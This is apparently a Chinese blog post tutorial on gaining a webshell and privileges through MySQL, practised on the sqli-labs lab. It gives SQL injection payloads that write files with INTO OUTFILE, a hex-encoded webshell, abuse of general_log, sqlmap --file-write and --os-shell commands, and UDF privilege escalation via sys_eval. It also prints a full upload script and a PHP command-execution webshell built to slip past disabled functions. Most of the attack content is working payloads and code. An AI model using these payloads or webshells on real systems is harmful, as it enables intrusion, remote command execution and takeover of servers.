数据库getshell
mysql
拿sqli-labs实验
先弄环境
linux下:
下载sqli-labs到/var/www/html
开启apache2、mysql
连接mysql执行命令:
create user 'sqlilab'@'localhost' identified by 'sqlilab';
GRANT ALL ON *.* TO 'sqlilab'@'localhost';
set password for 'sqlilab'@'localhost' = password('sqlilab');
flush privileges;
该sqli-labs连接数据库配置文件的用户名、密码
php setup-db.php
浏览器输入sqli-labs创建数据库
windows下:
直接phpstudy根目录下载sqli-labs
开始!
获取数据库权限
1.想办法拿到账号、密码连接数据库
2.使用sqlmap --sql-shell
3.mysql漏洞获取
获取websehll
思路就是通过sql注入写文件到web服务器,写有上传功能的文件、弹shell的文件都可以。
写文件的条件
1.知道web服务器的绝对路径,且路径有写入权限
2.数据库用户有写入的权限
3.secure_file_priv为空
一般web程序有数据库交互的,它会有一个配置文件,里面是连接数据的用户名和密码。这个用户要有写权限,再sql注入时才可以写入文件。
secure_file_priv为空可以向任何路径写入文件。但是Mysql5.5之后这个值默认为NULL,不能写入文件。
写入文件的payload
sqlmap写入
sqlmap -u "http://x.x.x.x/?id=x" --file-write="/path/to/shell.php" --file-dest="/var/www/html/test/shell.php"
--file-write:本地路径
--file-dest:web绝对路径
into outfile:
select '<?php phpinfo();?>' into outfile 'c:\phpstudy\www';
lines terminated by:
?id=-10' or 1234=1234 limit 0,1 into outfile 'c:\phpstudy\www' lines terminated by '<?php phpinfo();?>';
文件内容可以用16进制编码:
?id=-10' or 1234=1234 limit 0,1 into outfile 'c:\phpstudy\www' lines terminated by '3c3f706870706870696e666f28293b3f3e';
general log写文件
条件:
开启general_log
日志路径改成web的路径
查看general_log:show variables like 'general%';
开启general_log、更改路径为web的路径
set global general_log = "ON";
set global general_log_file = "c:\phpstudy\www\testLog.php";
写入php代码会被记录到指定文件
select '<?php phpinfo();?>'
不过写到日志这种方式,由于权限问题容易导致不能改变general_log_file的路径
sqlmap来获取webshell
通过sqlmap的 --os-shell模式
需要分辨web的语言
提供绝对路径
我们看apache的access日志
写入文件payload
url解码、16进制解码分别是
id=-4542' OR 5963=5963 LIMIT 0,1 INTO OUTFILE 'D:/phpstudy-pro/WWW/tmpugchg.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d443a5c5c70687073747564792d70726f5c5c5757575c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--
<?php
if (isset($_REQUEST["upload"])) {
$dir = $_REQUEST["uploadDir"];
if (phpversion() < '4.1.0') {
$file = $HTTP_POST_FILES["file"]["name"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir.".$file") or die();
} else {
$file = $_FILES["file"]["name"];
@move_uploaded_file($_FILES["file"]["tmp_name"], $dir."/".$file) or die();
}
@chmod($dir."/".$file, 0755);
echo "File uploaded";
} else {
echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=D:\\phpstudy-pro\\WWW\\> <input type=submit name=upload value=upload></form>";
}
?>
写了一个上传功能的php文件,给了相应的权限
通过上传功能马post传的马
<?php
$c = $_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time", 0);
$z = @ini_get("disable_functions");
if (!empty($z)) {
$z = preg_replace("/[, ]+/", ',', $z);
$z = explode(',', $z);
$z = array_map("trim", $z);
} else {
$z = array();
}
$c = $c . " 2>&1\n";
function f($n) {
global $z;
return is_callable($n) and !in_array($n, $z);
}
if (f("system")) {
ob_start();//开启输出缓存,输出都放到缓存里面
system($c);
$w = ob_get_clean();//获取缓存里的输出,并清除缓存
} elseif (f("proc_open")) {
$y = proc_open($c, array(
array(pipe, r),
array(pipe, w),
array(pipe, w)
), $t);
$w = NULL;
while (!feof($t[1])) {
$w .= fread($t[1], 512);
}
@proc_close($y);
} elseif (f("shell_exec")) {
$w = shell_exec($c);
} elseif (f("passthru")) {
ob_start();
passthru($c);
$w = ob_get_clean();
} elseif (f("popen")) {
$x = popen($c, r);
$w = NULL;
if (is_resource($x)) {
while (!feof($x)) {
$w .= fread($x, 512);
}
}
@pclose($x);
} elseif (f("exec")) {
$w = array();
exec($c, $w);
$w = join(chr(10), $w) . chr(10);
} else {
$w = 0;
}
echo "<pre>$w</pre>";
?>
sqlmap退出会删除上传的马,但是功能马还在
提权
udf提权
用户自定义函数提权
上传动态连接库到数据库的lib/plugin目录下,然后就可以在sql语句中使用自定以函数。
sqlmap的动态链接库:/usr/share/sqlmap/data/udf/mysql
sqlmap解码动态连接库的文件路径:usr/share/sqlmap/extra/cloak/cloak.py
使用:python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
#写入动态连接库
sqlmap --url http://192.168.57.1/sqli-labs/Less-13 --data="uname=*admin&passwd=admin&submit=Submit" --file-write="/usr/share/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest=" D:\phpstudy-pro\Extensions\MySQL5.7.26\lib\plugin\lib_mysqludf_sys_64.dll"
#手动写入(和写入文件一样)
into outfile
into dumpfile
lines terminated by
SELECT 0x7f454c4602... INTO DUMPFILE 'D:\phpstudy-pro\Extensions\MySQL5.7.26\lib\plugin\lib_mysqludf_sys_64.dll';
16进制串来源:SELECT hex(load_file('/usr/share/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll'));#读取指定文件内容作为结果返回再进行16进制编码
#创建函数并使用
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
select sys_eval("type");
一般是post上传动态连接库,get会限制字节长度
msf的动态链接库:/usr/share/metasploit-framework/data/exploits/mysql
标签:sqlmap,getshell,lib,--,数据库,写入,sys,file From: https://www.cnblogs.com/q1stop/p/18093242